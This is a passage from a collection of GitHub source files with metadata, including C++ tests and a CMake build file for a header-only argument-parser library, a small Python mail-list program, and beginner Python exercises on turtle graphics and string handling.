lang='c++')\nmettle = package('mettle')\nincludes = header_directory('include', include='*.h')\ndriver = test_driver(\n 'mettle -o verbose'\n)\n\nfor src in find_files('test/*.cc'):\n path = os.path.join('test', src.path.basename())\n test(executable(\n splitext(path)[0],\n files=[path],\n includes=includes,\n packages=mettle,\n ), driver=driver)\n" }, { "alpha_fraction": 0.6055071353912354, "alphanum_fraction": 0.6157055497169495, "avg_line_length": 39.09665298461914, "blob_id": "a8657efb16862ef71ab1ed63a2c5cee42fd456d2", "content_id": "e40a88c73caed3f694b4c123b76d93594841b5f4", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10786, "license_type": "permissive", "max_line_length": 82, "num_lines": 269, "path": "/test/flags.cc", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "#include \"flags.h\"\n\n#include <array>\n#include <mettle.hpp>\n#include <stdexcept>\n#include <string>\n#include <string_view>\n#include <cstring>\n#include <algorithm>\n\nusing namespace mettle;\n\nnamespace {\n// TODO: Initialize argv into unique_ptr so RAII can take care of everything.\n// Currently C-style initialization and deletion purely out of laziness. :(\n\n// Allocates a position within argv and copies the given view to it.\n// argv must already be allocated.\nvoid initialize_arg(char** argv, const size_t index,\n const std::string_view& view) {\n argv[index] =\n reinterpret_cast<char*>(malloc((view.size() + 1) * sizeof(char)));\n memcpy(argv[index], view.data(), view.size() + 1);\n}\n\n// Allocates all of argv from the given argument array.\n// - argv[0] will always be TEST, there is no need to pass a program argument.\n// - argv(0, N) will contain the passed in array.\n// - argv[N] will always be NULL.\n// argv's final size will be the array's size plus two due to the first and last\n// conditions.\nchar** initialize_argv(const std::initializer_list<const char*> args) {\n char** argv =\n reinterpret_cast<char**>(malloc((args.size() + 2) * sizeof(char*)));\n initialize_arg(argv, 0, \"TEST\");\n std::size_t i = 0;\n for (const auto& arg : args) {\n initialize_arg(argv, ++i, arg);\n }\n argv[args.size() + 1] = NULL;\n return argv;\n}\n\n// Same as above but using a std::vector\nchar** initialize_argv(const std::vector<const char*>& args) {\n char** argv =\n reinterpret_cast<char**>(malloc((args.size() + 2) * sizeof(char*)));\n initialize_arg(argv, 0, \"TEST\");\n std::size_t i = 0;\n for (const auto& arg : args) {\n initialize_arg(argv, ++i, arg);\n }\n argv[args.size() + 1] = NULL;\n return argv;\n}\n\n// Cleans up every item within argv, then argv itself.\nvoid cleanup_argv(char** argv) {\n size_t index = 0;\n while (argv[index]) delete[] argv[index++];\n delete argv;\n}\n} // namespace\n\n// Simple fixture for (de)allocating argv and initalizing flags::args.\nstruct args_fixture {\n static args_fixture create(const std::initializer_list<const char*> args) {\n return {args.size(), initialize_argv(args)};\n }\n static args_fixture create(const std::vector<const char*>& args) {\n return {args.size(), initialize_argv(args)};\n }\n ~args_fixture() { cleanup_argv(argv_); }\n\n size_t argc() const { return argc_; }\n const flags::args& args() const { return args_; }\n std::string argv(const size_t index) const {\n if (index >= argc_) throw std::out_of_range(\"index larger than argc\");\n return argv_[index];\n };\n\n private:\n args_fixture(const size_t argc, char** argv)\n : argc_(argc + 1 /* for program */), argv_(argv), args_(argc_, argv) {}\n const size_t argc_;\n char** argv_;\n const flags::args args_;\n};\n\nsuite<> positional_arguments(\"positional arguments\", [](auto& _) {\n // Lack of positional arguments.\n _.test(\"absence\", []() {\n const auto fixture =\n args_fixture::create({\"--no\", \"positional\", \"--arguments\"});\n expect(fixture.args().positional().size(), equal_to(0));\n expect(fixture.args().get<int>(0), equal_to(std::nullopt));\n expect(fixture.args().get<int>(0, 3), equal_to(3));\n });\n\n // Testing the existence of positional arguments with no options or flags.\n _.test(\"basic\", []() {\n const auto fixture = args_fixture::create({\"positional\", \"arguments\"});\n expect(fixture.args().positional().size(), equal_to(2));\n expect(fixture.args().positional()[0], equal_to(\"positional\"));\n expect(fixture.args().positional()[1], equal_to(\"arguments\"));\n // Tests for positional getters\n expect(fixture.args().get<std::string_view>(0), equal_to(\"positional\"));\n expect(fixture.args().get<std::string_view>(1), equal_to(\"arguments\"));\n expect(fixture.args().get<std::string_view>(2), equal_to(std::nullopt));\n expect(fixture.args().get<std::string>(0, \"default\"),\n equal_to(\"positional\"));\n expect(fixture.args().get<std::string>(1, \"default\"),\n equal_to(\"arguments\"));\n expect(fixture.args().get<std::string>(2, \"default\"), equal_to(\"default\"));\n });\n\n // Adding options to the mix.\n _.test(\"with options\", []() {\n const auto fixture = args_fixture::create(\n {\"positional\", \"arguments\", \"-with\", \"--some\", \"---options\"});\n expect(fixture.args().positional().size(), equal_to(2));\n expect(fixture.args().positional()[0], equal_to(\"positional\"));\n expect(fixture.args().positional()[1], equal_to(\"arguments\"));\n // Tests for positional getters\n expect(fixture.args().get<std::string_view>(0), equal_to(\"positional\"));\n expect(fixture.args().get<std::string_view>(1), equal_to(\"arguments\"));\n expect(fixture.args().get<std::string_view>(2), equal_to(std::nullopt));\n expect(fixture.args().get<std::string>(0, \"default\"),\n equal_to(\"positional\"));\n expect(fixture.args().get<std::string>(1, \"default\"),\n equal_to(\"arguments\"));\n expect(fixture.args().get<std::string>(2, \"default\"), equal_to(\"default\"));\n });\n\n // Adding flags to the mix.\n _.test(\"with flags\", []() {\n const auto fixture = args_fixture::create(\n {\"--flag\", \"\\\"not positional\\\"\", \"positional\", \"--another-flag\", \"foo\",\n \"arguments\", \"--bar\", \"42\"});\n expect(fixture.args().positional().size(), equal_to(2));\n expect(fixture.args().positional()[0], equal_to(\"positional\"));\n expect(fixture.args().positional()[1], equal_to(\"arguments\"));\n // Tests for positional getters\n expect(fixture.args().get<std::string_view>(0), equal_to(\"positional\"));\n expect(fixture.args().get<std::string_view>(1), equal_to(\"arguments\"));\n expect(fixture.args().get<std::string_view>(2), equal_to(std::nullopt));\n expect(fixture.args().get<std::string>(0, \"default\"),\n equal_to(\"positional\"));\n expect(fixture.args().get<std::string>(1, \"default\"),\n equal_to(\"arguments\"));\n expect(fixture.args().get<std::string>(2, \"default\"), equal_to(\"default\"));\n });\n\n // Adding both flags and options.\n _.test(\"with flags and options\", []() {\n const auto fixture = args_fixture::create(\n {\"--flag\", \"\\\"not positional\\\"\", \"positional\", \"--another-flag\", \"foo\",\n \"arguments\", \"--bar\", \"42\", \"--some\", \"--options\", \"--foobaz\"});\n expect(fixture.args().positional().size(), equal_to(2));\n expect(fixture.args().positional()[0], equal_to(\"positional\"));\n expect(fixture.args().positional()[1], equal_to(\"arguments\"));\n // Tests for positional getters\n expect(fixture.args().get<std::string_view>(0), equal_to(\"positional\"));\n expect(fixture.args().get<std::string_view>(1), equal_to(\"arguments\"));\n expect(fixture.args().get<std::string_view>(2), equal_to(std::nullopt));\n expect(fixture.args().get<std::string>(0, \"default\"),\n equal_to(\"positional\"));\n expect(fixture.args().get<std::string>(1, \"default\"),\n equal_to(\"arguments\"));\n expect(fixture.args().get<std::string>(2, \"default\"), equal_to(\"default\"));\n });\n});\n\nsuite<> flag_parsing(\"flag parsing\", [](auto& _) {\n // Basic bool parsing.\n _.test(\"bool\", []() {\n const auto fixture =\n args_fixture::create({\"--foo\", \"1\", \"--bar\", \"no\", \"--verbose\"});\n expect(*fixture.args().get<bool>(\"foo\"), equal_to(true));\n expect(fixture.args().get<bool>(\"foo\", false), equal_to(true));\n expect(*fixture.args().get<bool>(\"bar\"), equal_to(false));\n expect(*fixture.args().get<bool>(\"verbose\"), equal_to(true));\n expect(fixture.args().get<bool>(\"nonexistent\"), equal_to(std::nullopt));\n });\n\n // Verifying all the falsities are actually false.\n _.test(\"falsities\", []() {\n for (const auto falsity : flags::detail::falsities) {\n const auto fixture = args_fixture::create({\"--foo\", falsity});\n expect(*fixture.args().get<bool>(\"foo\"), equal_to(false));\n expect(fixture.args().get<bool>(\"foo\", true), equal_to(false));\n }\n });\n\n // Complex strings are succesfully parsed.\n _.test(\"string\", []() {\n constexpr char LOREM_IPSUM[] =\n \"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do \"\n \"eiusmod tempor incididunt ut labore et dolore magna aliqua.\";\n const auto fixture = args_fixture::create({\"--foo\", LOREM_IPSUM});\n expect(*fixture.args().get<std::string>(\"foo\"),\n equal_to(std::string(LOREM_IPSUM)));\n });\n\n // Empty values\n _.test(\"empty\", [](){\n const auto fixture = args_fixture::create({\"--foo\", \"\"});\n expect(*fixture.args().get<std::string>(\"foo\"), equal_to(\"\"));\n });\n\n // Multiple values for one flag\n _.test(\"multiple\", [](){\n const auto fixture = args_fixture::create({\"--foo\", \"bar\", \"--foo\", \"baz\"});\n auto foo = fixture.args().get_multiple<std::string>(\"foo\");\n expect(foo.size(), equal_to(2));\n expect(foo[0].value(), equal_to(\"bar\"));\n expect(foo[1].value(), equal_to(\"baz\"));\n });\n\n _.test(\"multiple with type\", [](){\n const auto fixture = args_fixture::create({\"-x\", \"-x\", \"1\", \"-x\", \"2\"});\n auto x = fixture.args().get_multiple<int>(\"x\", 0);\n expect(x.size(), equal_to(3));\n expect(x[0], equal_to(0));\n expect(x[1], equal_to(1));\n expect(x[2], equal_to(2));\n });\n\n _.test(\"multiple falsities\", [](){\n std::vector<const char*> args;\n for (const auto falsity : flags::detail::falsities) {\n args.push_back(\"--foo\");\n args.push_back(falsity);\n }\n const auto fixture = args_fixture::create(args);\n const auto foos1 = fixture.args().get_multiple<bool>(\"foo\");\n for (const auto& foo : foos1) {\n expect(foo && *foo, equal_to(false));\n }\n const auto foos2 = fixture.args().get_multiple<bool>(\"foo\", true);\n for (const auto& foo : foos2) {\n expect(foo, equal_to(false));\n }\n });\n\n _.test(\"multiple valueless flags\", [](){\n const auto fixture = args_fixture::create({\"--foo\", \"-foo\", \"--foo\", \"-foo\"});\n const auto foos = fixture.args().get_multiple<bool>(\"foo\");\n expect(foos.size(), equal_to(4));\n for (const auto& foo : foos) {\n expect(static_cast<bool>(foo), equal_to(true));\n }\n });\n\n // Basic number parsing. Verifying ints are truncated and doubles are\n // succesfully parsed.\n _.test(\"numbers\", []() {\n const auto fixture =\n args_fixture::create({\"--foo\", \"42\", \"--bar\", \"42.42\"});\n expect(*fixture.args().get<int>(\"foo\"), equal_to(42));\n expect(*fixture.args().get<double>(\"foo\"), equal_to(42));\n expect(*fixture.args().get<int>(\"bar\"), equal_to(42));\n expect(*fixture.args().get<double>(\"bar\"), equal_to(42.42));\n expect(fixture.args().get<int>(\"foobar\", 42), equal_to(42));\n expect(fixture.args().get<double>(\"foobar\", 42.4242), equal_to(42.4242));\n expect(fixture.args().get<int>(\"foobar\"), equal_to(std::nullopt));\n expect(fixture.args().get<double>(\"foobar\"), equal_to(std::nullopt));\n });\n});\n" }, { "alpha_fraction": 0.7082551717758179, "alphanum_fraction": 0.7129455804824829, "avg_line_length": 35.13559341430664, "blob_id": "288024dcdf293ff385a6bd2ae919f9cac0ae2df6", "content_id": "20c680fbbb2c7d85eac0ab2e56fb89e91e076cd6", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 2132, "license_type": "permissive", "max_line_length": 92, "num_lines": 59, "path": "/CMakeLists.txt", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 3.12)\n\nproject(\n flags\n VERSION\n 1.0.0\n DESCRIPTION\n \"Simple, extensible, header-only C++17 argument parser released into the public domain.\"\n HOMEPAGE_URL\n \"https://github.com/sailormoon/flags\")\n\nadd_library(${PROJECT_NAME} INTERFACE)\n\n# Add alias so the project can be used with add_subdirectory\nadd_library(${PROJECT_NAME}::${PROJECT_NAME} ALIAS ${PROJECT_NAME})\n\ninclude(GNUInstallDirs)\n\n# Adding the install interface generator expression makes sure that the include\n# files are installed to the proper location (provided by GNUInstallDirs)\ntarget_include_directories(\n ${PROJECT_NAME}\n INTERFACE $<BUILD_INTERFACE:${${PROJECT_NAME}_SOURCE_DIR}/include>\n $<INSTALL_INTERFACE:${CMAKE_INSTALL_INCLUDEDIR}>)\n\ntarget_compile_features(${PROJECT_NAME} INTERFACE cxx_std_17)\n\n# Locations are provided by GNUInstallDirs\ninstall(TARGETS ${PROJECT_NAME}\n EXPORT ${PROJECT_NAME}_Targets\n ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR}\n LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR}\n RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR})\n\ninclude(CMakePackageConfigHelpers)\nwrite_basic_package_version_file(\"${PROJECT_NAME}ConfigVersion.cmake\"\n VERSION ${PROJECT_VERSION}\n COMPATIBILITY SameMajorVersion)\n\nconfigure_package_config_file(\n \"${PROJECT_SOURCE_DIR}/cmake/${PROJECT_NAME}Config.cmake.in\"\n \"${PROJECT_BINARY_DIR}/${PROJECT_NAME}Config.cmake\"\n INSTALL_DESTINATION\n ${CMAKE_INSTALL_DATAROOTDIR}/${PROJECT_NAME}/cmake)\n\ninstall(EXPORT ${PROJECT_NAME}_Targets\n FILE ${PROJECT_NAME}Targets.cmake\n NAMESPACE ${PROJECT_NAME}::\n DESTINATION ${CMAKE_INSTALL_DATAROOTDIR}/${PROJECT_NAME}/cmake)\n\ninstall(FILES \"${PROJECT_BINARY_DIR}/${PROJECT_NAME}Config.cmake\"\n \"${PROJECT_BINARY_DIR}/${PROJECT_NAME}ConfigVersion.cmake\"\n DESTINATION ${CMAKE_INSTALL_DATAROOTDIR}/${PROJECT_NAME}/cmake)\n\ninstall(DIRECTORY ${PROJECT_SOURCE_DIR}/include/${PROJECT_NAME} DESTINATION include)\n\nset(CPACK_RESOURCE_FILE_LICENSE \"${PROJECT_SOURCE_DIR}/LICENSE\")\n\ninclude(CPack)\n" } ]
5
Hororohoruru/Python-mail-database
https://github.com/Hororohoruru/Python-mail-database
74f617e5a761fc68bf629e816fa9ca3b926acd26
7c8f0fa6be8b89ade9724588ba73eef80a88df6b
c8cd0944863da526f2729f258c49199418fdb586
refs/heads/master
2021-04-30T08:33:59.908815
2018-02-13T12:23:26
2018-02-13T12:23:26
121,379,110
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7937062978744507, "alphanum_fraction": 0.7972028255462646, "avg_line_length": 46.66666793823242, "blob_id": "f328fb18d4d58304cfb26de095eb4de5bd92840d", "content_id": "c9dc487668d10bda974163ec8c1d7ea8de02bed5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 286, "license_type": "no_license", "max_line_length": 129, "num_lines": 6, "path": "/README.md", "repo_name": "Hororohoruru/Python-mail-database", "src_encoding": "UTF-8", "text": "# Python-mail-database\n\nThis program allows the user to create a simple database with names and e-mails and store them in a csv file.\n\nThis program is inspired by the project of the 4th week of the Coursera course \"Python programming: a concise introduction\", from\nWesleyan University.\n" }, { "alpha_fraction": 0.51609867811203, "alphanum_fraction": 0.5200939774513245, "avg_line_length": 26.3799991607666, "blob_id": "d0c455bbdbd269d49e552f3859e262f7e19bda22", "content_id": "7e1f9bcc18b622dd5a1a2c0984bd5ef23303b659", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4255, "license_type": "no_license", "max_line_length": 78, "num_lines": 150, "path": "/mail_database.py", "repo_name": "Hororohoruru/Python-mail-database", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis program allows the user to create a small database containing names\r\nand e-mail directions. The user will be able to add, delete and edit new\r\nentries via the menu, and store the database in a csv file\r\n\"\"\"\r\nimport os\r\nimport csv\r\n\r\n\r\nmails = []\r\nname_pos = 0\r\nmail_pos = 1\r\nmail_header = ['Name', 'Mail']\r\n\r\n\r\ndef valid_menu_choice(which):\r\n if not which.isdigit():\r\n print(which + \"needs to be the number of an entry\")\r\n return False\r\n which = int(which)\r\n if which < 1 or which > len(mails):\r\n print(str(which) + \"needs to be the number of an entry\")\r\n return False\r\n return True\r\n\r\ndef delete_mail(which):\r\n if not valid_menu_choice(which):\r\n return\r\n which = int(which)\r\n del mails[which - 1]\r\n print(\"Deleted entry number\",which)\r\n print()\r\n \r\ndef edit_mail(which):\r\n if not valid_menu_choice(which):\r\n return\r\n which = int(which)\r\n \r\n mail = mails[which - 1]\r\n print(\"Enter the data for a new entry. Press <enter> to leave un changed\")\r\n \r\n print()\r\n print(\"Current name for this entry is '\",mail[name_pos], \"'\")\r\n newname = input(\"Enter new name or press return: \")\r\n if newname == \"\":\r\n newname = mail[name_pos]\r\n \r\n print()\r\n print(\"Current mail address for this entry is '\",mail[mail_pos],\"'\")\r\n new_mail = input(\"Enter new mail or press return: \")\r\n if new_mail == \"\":\r\n new_mail = mail[mail_pos]\r\n \r\n mail = [newname, new_mail]\r\n mails[which - 1] = mail\r\n \r\n print()\r\n print(\"The mail for the entry\",which,\"has been updated to:\")\r\n print(\"Name: \",newname)\r\n print(\"Mail: \",new_mail)\r\n print()\r\n \r\ndef load_mail_list():\r\n if os.access(\"mail_list.csv\",os.F_OK):\r\n f = open(\"mail_list.csv\")\r\n for row in csv.reader(f):\r\n mails.append(row)\r\n f.close()\r\n \r\ndef save_mail_list():\r\n f = open(\"mail_list.csv\", 'w', newline ='')\r\n for entry in mails:\r\n csv.writer(f).writerow(entry)\r\n f.close()\r\n \r\ndef show_mails():\r\n print()\r\n show_mail(mail_header, \"\")\r\n index = 1\r\n for mail in mails:\r\n show_mail(mail, index)\r\n index += 1\r\n print()\r\n \r\ndef show_mail(mail, index):\r\n outputstr = \"{0:>3} {1:<20} {2:<32}\"\r\n print(outputstr.format(index, mail[name_pos], mail[mail_pos]))\r\n \r\ndef create_mail():\r\n print(\"Creating a new mail entry. Please enter the data below:\")\r\n newname = input(\"Please, enter the name: \")\r\n new_mail = input(\"Please, enter the mail address: \")\r\n mail = [newname, new_mail]\r\n mails.append(mail)\r\n print()\r\n print(\"The mail entry for\",newname,\"has been added successfully\")\r\n print()\r\n \r\ndef menu_choice():\r\n \"\"\" Menu with program options \"\"\"\r\n print(\"Please choose one of the following options:\")\r\n print(\" s) Show\")\r\n print(\" n) New\")\r\n print(\" e) Edit\")\r\n print(\" d) Delete\")\r\n print(\" q) Quit\")\r\n choice = input(\"Your choice: \")\r\n if choice.lower() in [\"s\", \"n\", \"d\", \"e\", \"q\"]:\r\n return choice.lower()\r\n else:\r\n print(choice,\" is not a valid option. Please, try again\")\r\n return None\r\n \r\ndef main_loop():\r\n \r\n load_mail_list()\r\n \r\n while True:\r\n choice = menu_choice()\r\n if choice == None:\r\n continue\r\n elif choice == \"q\":\r\n print(\"Exiting...\")\r\n break\r\n elif choice == \"s\":\r\n show_mails()\r\n elif choice == \"n\":\r\n create_mail()\r\n elif choice == \"e\":\r\n input_ = (\"Which item do you want to edit? (Press \"\r\n \"q to go back to the menu) \")\r\n which = input(input_)\r\n if which.lower() == \"q\":\r\n print()\r\n continue\r\n edit_mail(which)\r\n elif choice == \"d\":\r\n input_ = (\"Which item do you want to delete? (Press \"\r\n \"q to go back to the menu) \")\r\n which = input(input_)\r\n if which.lower() == \"q\":\r\n print()\r\n continue\r\n delete_mail(which)\r\n \r\n save_mail_list() \r\n \r\nif __name__ == '__main__':\r\n main_loop()" } ]
2
wsnijder/PycharmProjects
https://github.com/wsnijder/PycharmProjects
7596b0029c2065a23144c8f71bf57af1a2bec74c
48633c2b00aea1db669076dba4a15ca3fcdd52e6
3cb8fe6846c592939c52ae056212fb70cf9f03e9
refs/heads/master
2023-01-10T13:44:15.913635
2020-11-06T20:26:11
2020-11-06T20:26:11
299,880,729
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7237762212753296, "alphanum_fraction": 0.7342657446861267, "avg_line_length": 18.066667556762695, "blob_id": "8655e63d1edbe2d8795e6e7ae22e22aea463b804", "content_id": "a505d2881d95e0b478071710df1ea87c94cdeb48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 286, "license_type": "no_license", "max_line_length": 66, "num_lines": 15, "path": "/Week_6_Python/Exercise 3/5.3.23.2.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "# two turtles created\n\nimport turtle\n\ntess = turtle.Turtle()\nalex = tess\nalex.color(\"hotpink\")\n\nif tess is alex:\n print(\"there is one turtle created\")\nelse: print(\"there are two turtles created\")\n\n# color applies to both turtles since it is aliased and not cloned\n\nalex.forward(100)\n" }, { "alpha_fraction": 0.5668449401855469, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 18.736841201782227, "blob_id": "53ee20530a32cd38fead706db0df98b939c4a62f", "content_id": "a38e6f1065cdb439c9a733a121237544041cc37d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 374, "license_type": "no_license", "max_line_length": 56, "num_lines": 19, "path": "/Week 4 python/exercise 3.4.4.2.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "arrival = int(input(\"On what day do you arrive?\"))\nstaying = int(input(\"What is the length of your stay?\"))\n\ndag = (arrival+staying)%7\n\nif dag == 0:\n print(\"Sunday\")\nif dag == 1:\n print(\"Monday\")\nif dag == 2:\n print(\"Tuesday\")\nif dag == 3:\n print(\"Wednesday\")\nif dag == 4:\n print(\"Thursday\")\nif dag == 5:\n print(\"Friday\")\nif dag == 6:\n print(\"Saturday\")" }, { "alpha_fraction": 0.7127071619033813, "alphanum_fraction": 0.7127071619033813, "avg_line_length": 21.75, "blob_id": "4c08218e1d5b5d990201ece28d832f7453684866", "content_id": "305459e4c3ab2400f1f0f64b722eaf7a27e18b52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 42, "num_lines": 8, "path": "/Week_6_Python/Exercise_1/5.1.19.3.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def count_letters(word):\n result = len(word)\n return result\n\n\nanswer = str(input(\"name a word\"))\ncalculation = count_letters(answer)\nprint(\"number of letters is\", calculation)" }, { "alpha_fraction": 0.6540540456771851, "alphanum_fraction": 0.6702702641487122, "avg_line_length": 25.285715103149414, "blob_id": "8e685d1337de9d07a0adce2fce008c64f3dcb9c8", "content_id": "20370b95099c4f19e94e28337cba26d31a2a258a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 185, "license_type": "no_license", "max_line_length": 45, "num_lines": 7, "path": "/Week_6_Python/Exercise 3/5.3.23.6.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def scalar_mult(scalar, vector):\n outcomevector = []\n for element in vector:\n outcomevector.append(scalar * vector)\n return outcomevector\n\nprint(scalar_mult(3, [1,2]))\n\n" }, { "alpha_fraction": 0.6176470518112183, "alphanum_fraction": 0.625668466091156, "avg_line_length": 27.730770111083984, "blob_id": "0109dbe6823a8eb099bc1df61ad338db43c0db46", "content_id": "187b93ff798d19821be94f2b3d390e9772fd5482", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 748, "license_type": "no_license", "max_line_length": 119, "num_lines": 26, "path": "/Week_6_Python/Exercise 3/practicing.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "horsemen = [\"war\", \"famine\", \"pestilence\", \"death\"]\nfor i in range(len(horsemen)):\n print(horsemen[i])\n\nfor words in horsemen:\n print(words)\n\nstudents = [(\"John\", [\"CompSci\", \"Physics\"]),(\"Vusi\", [\"Maths\", \"CompSci\", \"Stats\"]),(\"Jess\", [\"CompSci\", \"Accounting\",\n\"Economics\", \"Management\"]),(\"Sarah\", [\"InfSys\", \"Accounting\", \"Economics\", \"CommLaw\"]),(\"Zuki\", [\"Sociology\",\n\"Economics\", \"Law\", \"Stats\", \"Music\"])]\n\ncounter = 0\nfor name, subjects in students:\n if \"Economics\" in subjects:\n counter += 1\n\nprint(\"The number of students taking Economics is\", counter)\n\ndeel1 = [\"alpha\", \"beta\", \"gamma\"]\ndeel2 = [\"is niks\"]\nsamen = deel1 + deel2\nprint(samen)\n\nfriends = [\"Ren\", \"Den\", \"maatje\"]\nfor friend in friends:\n print(friend)\n\n" }, { "alpha_fraction": 0.5816993713378906, "alphanum_fraction": 0.6209150552749634, "avg_line_length": 16.11111068725586, "blob_id": "0b0dc5e698764cfc7c5bf281e40aedd8865bbb1e", "content_id": "9b070083d2ee80e992a55929b9a02ac177cf7db9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 49, "num_lines": 9, "path": "/Week 4 python/exercise 3.4.4.6.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "exammark= float(input(\"What is your exam mark?\"))\n\nif exammark >=75:\n print(\"First\")\n\nif 70 <= exammark < 75:\n print(\"Upper second\")\n\n#And so on..." }, { "alpha_fraction": 0.38297873735427856, "alphanum_fraction": 0.5106382966041565, "avg_line_length": 10.75, "blob_id": "8218179d9cdeac85a3a5e6e128b5dde15e509be4", "content_id": "22f206ca4f3a5c68932c6eb4b3213303a08b61d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 47, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/Week 4 python/exercise 3.4.4.3.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "#b<=a\n#b<a\n#a<18 and day!=3\n# a<18 and day ==3\n" }, { "alpha_fraction": 0.5784313678741455, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 24.75, "blob_id": "cd99b1ce969c42bb7e1d818b212bd1b79d0ee08d", "content_id": "52f30c0be4b5b47a675c973253880e6e4f7943be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/Week 4 python/exercise 3.4.4.4.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "# 1 equals, true\n# 2 doest not equal, false\n# 3 greater or equal than, false\n# 4 (0,3) ; (4,+infinity)" }, { "alpha_fraction": 0.5924170613288879, "alphanum_fraction": 0.6303317546844482, "avg_line_length": 13.066666603088379, "blob_id": "6fb0ce7bb589f23356529ac4ab94210bd0bee68a", "content_id": "6a1e907e04b7f581f8870dbbe82fd9a98a7f02a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 211, "license_type": "no_license", "max_line_length": 25, "num_lines": 15, "path": "/Week 4 python/4.9.9.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\n\nt = turtle.Turtle()\nt.pensize(3)\n\ndef draw_triangle(t, sz):\n for _ in range(5):\n t.forward(sz)\n t.right(144)\n\ndraw_triangle(t,100)\n\nwindow.exitonclick()\n" }, { "alpha_fraction": 0.5873016119003296, "alphanum_fraction": 0.5873016119003296, "avg_line_length": 22.625, "blob_id": "4e4936b496c19679354eae3e24ce484602deb888", "content_id": "fe099b453ef8bf5fb4b39f44ae7fd1aa5660fa7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/Week_6_Python/Exercise_1/5.1.19.9.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "def remove_letter(letter, word):\n without_letter = \"\"\n for c in word:\n if c not in word:\n without_letter += c\n return without_letter\n\nremove_letter(\"a\", \"apple\")\n" }, { "alpha_fraction": 0.641791045665741, "alphanum_fraction": 0.6686567068099976, "avg_line_length": 15, "blob_id": "4533513a3c4eb11f2100f152757b50822fd9b5ab", "content_id": "011cbfb3996f92c111d1fea96f54d2baa47eed11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 335, "license_type": "no_license", "max_line_length": 30, "num_lines": 21, "path": "/Week 5 Python/4.9.5.2.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle()\ntess.pensize(2)\ntess.color(\"blue\")\n\ndef draw_square(animal, size):\n animal.forward(size)\n animal.right(90)\n\nsize = 2\nfor _ in range(90):\n tess.right(1)\n draw_square(tess, size)\n size += 4\n tess.speed(0)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.65625, "avg_line_length": 15.809523582458496, "blob_id": "5980abd94b12b66b05dcce3cc436a52f947743c4", "content_id": "6dcef12526c23b32727245b324b79257b0c5db74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 30, "num_lines": 21, "path": "/Week 5 Python/4.9.4.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": "UTF-8", "text": "import turtle\n\nwindow = turtle.Screen()\nwindow.bgcolor(\"lightgreen\")\n\ntess = turtle.Turtle()\ntess.pensize(3)\ntess.color(\"blue\")\n\ndef draw_square(animal, size):\n for _ in range(4):\n animal.forward(size)\n animal.left(90)\n\nsize = 80\nfor _ in range(20):\n tess.right(18)\n draw_square(tess,size)\n tess.speed(0)\n\nwindow.exitonclick()" }, { "alpha_fraction": 0.5880149602890015, "alphanum_fraction": 0.6104868650436401, "avg_line_length": 16.866666793823242, "blob_id": "61cff9694bc6aa3d1c8f9d0c1090614d05b8b069", "content_id": "be1ddcc19d6663b7d76e644972fbc9399ad4a456", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 267, "license_type": "no_license", "max_line_length": 42, "num_lines": 15, "path": "/Week_6_Python/Exercise 3/5.3.23.1.py", "repo_name": "wsnijder/PycharmProjects", "src_encoding": 